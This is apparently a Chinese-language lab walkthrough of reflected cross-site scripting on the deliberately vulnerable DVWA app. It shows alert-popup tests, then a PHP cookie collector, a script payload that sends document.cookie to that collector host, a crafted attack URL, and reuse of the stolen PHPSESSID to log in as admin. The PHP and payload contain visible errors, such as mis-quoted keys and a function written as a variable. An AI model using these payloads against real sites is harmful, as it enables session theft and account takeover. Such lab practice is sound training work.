DVWA-xss(跨站腳本漏洞)
首先進入DVWA頁面,選擇low等級。
進入xxs(reflect)頁面。
我們在彈窗中進行測試,輸入xxs則結果如下:
然後再輸入<xss>xss腳本試一試。結果如下:
查看元素發現helllo後面出現一對xss標簽,似乎可以html註入。
接下來我們進行xss彈窗測試,能彈窗則存在xss漏洞。
我們先輸入xss則在URL中顯示name=xss
那我們讓name=<script>alert(/xss/)</script>則結果如下:
註:可以彈窗的函數有alert(),confirm(),prompt()
xss攻擊思路:
主要有四方:用戶,被攻擊的web服務器,攻擊者,攻擊者的web服務器
首先進行攻擊者的web設計
我們就用下面這個URL http://127.0.0.1/cookie.php
在wamp的www目錄下創建一個cookie.php文件,內容如下:
<?php
$cookie=$_GET[‘$cookie‘];//將get請求參數存儲到cookie變量中
$file_put_contents(‘cookie.txt‘,$cookie);//把偷取的用戶cookie寫到cookie.txt文件中。
?>
構造攻擊js
<script>document.location=‘http://127.0.0.1/cookie.php/?cookie=‘+document.cookie;</script>
//document.location將頁面的內容指定到指定位置。
構造並發送攻擊URL
http://localhost:8080/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location=‘http://127.0.0.1/cookie.php/?cookie=‘+document.cookie:</script># //要對參數進行URL編碼
獲得cookie.txt,我們訪問cookie.txt
PHPSESSID是被攻擊者的登錄憑證。
F12調出cookie右鍵點擊編輯把PHPSESSEN換成我們獲取的。
然後訪問DVWA的index.php,則就以管理員的身份進入,如下圖
DVWA-xss(跨站腳本漏洞)